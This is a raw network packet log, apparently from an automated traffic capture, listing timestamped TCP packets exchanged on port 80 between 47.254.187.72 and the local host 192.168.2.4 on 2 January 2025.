                                                                            Jan 2, 2025 20:34:51.159189939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159195900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.159200907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159213066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159224033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159225941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.159231901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.159251928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.161422968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161433935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161444902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161454916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161470890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161473989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.161492109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.161505938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161505938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.161518097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161528111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.161537886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.161555052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163064003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163075924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163086891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163096905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163109064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163114071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163119078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163130045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163130045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163141012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163156986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163171053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163188934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163355112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163395882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163420916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163429976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163446903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163459063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163461924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163474083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163477898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163485050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163496017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163500071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163505077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.163523912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.163544893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.166152954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166163921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166174889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166184902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166194916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166202068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166204929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.166208029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166213989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166220903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.166271925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.166976929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.166985989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167001963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167012930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167017937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167022943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167032957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167035103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167046070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167052031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167062044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167067051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167083025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167104006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167124033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167124987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167138100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167149067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167160034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167161942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167177916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167185068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167186975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167198896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167201996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167222977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167242050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167360067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167371035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167382002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167392015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167396069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167408943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167414904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167419910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167431116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167432070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167442083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167450905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167452097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167464018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.167473078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167489052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.167506933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.177623987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177690983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177700996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177707911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177717924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177725077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.177728891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177740097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.177762032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.177768946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.177788973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.179959059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.179980040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.179991961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.179996967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180011034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180016994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180027008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180031061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180051088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180057049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180067062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180068016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180078030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180088043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180108070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180927992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180948973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.180970907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.180990934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.181082010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181093931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181104898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181116104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181119919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.181128025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181138039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.181145906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.181176901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.184056044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184067011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184072971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184078932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184089899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184101105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184112072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184120893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.184153080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.184313059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.187853098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187864065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187870026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187875032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187880993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187886953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.187892914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188091040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.188453913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188463926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188481092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188489914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188498020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.188502073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188513041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188519955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.188524008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188534021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.188555956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.188590050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.191380978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191390991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191406965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191417933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191427946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191428900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.191438913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191448927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191448927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.191461086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191468000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.191469908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.191534996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.193562031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193615913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.193655968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193665028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193675995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193686008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.193687916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193701982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193706036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.193713903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193722963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.193723917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.193757057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.246144056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246159077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246171951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246184111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246195078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246197939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.246206999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246217966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246228933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.246229887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.246251106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.246268034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.248656988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248668909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248681068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248691082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248702049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248701096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.248712063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248723984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.248724937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.248747110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.248760939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.249763966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249805927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.249821901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249830961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249849081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249859095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.249861956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249871969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249883890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.249886036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249897003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.249910116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.249937057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.250272989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250283957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250293970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250308037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.250328064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.250330925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250340939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250351906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250363111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.250363111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.250394106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.252882957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252895117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252913952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252924919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252926111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.252957106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.252957106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.252966881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252979040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.252990007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253009081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253032923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253784895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253794909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253804922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253832102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253854036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253880024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253890991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253902912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253914118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253916979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253925085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253936052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253947973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253962994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253963947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.253973961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.253995895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254019022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254075050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254086018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254096985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254106998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254112005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254117966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254128933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254143953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254165888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254189968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254198074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254206896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254218102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254228115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254234076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254251957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254251957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254262924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254272938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254275084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254285097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.254292965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.254323006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.264537096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264588118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.264621019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264631033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264648914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264659882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264659882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.264669895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264681101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264686108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.264693022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.264698029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.264744043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.267729044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267739058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267782927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.267839909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267853975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267864943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267875910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267887115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267891884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.267898083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.267930031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.267946005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269594908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269623041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269633055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269638062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269654989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269661903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269673109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269682884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269700050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269717932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269746065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269756079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269766092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.269789934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.269824028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.272828102 CET804973047.254.187.72192.168.2.4
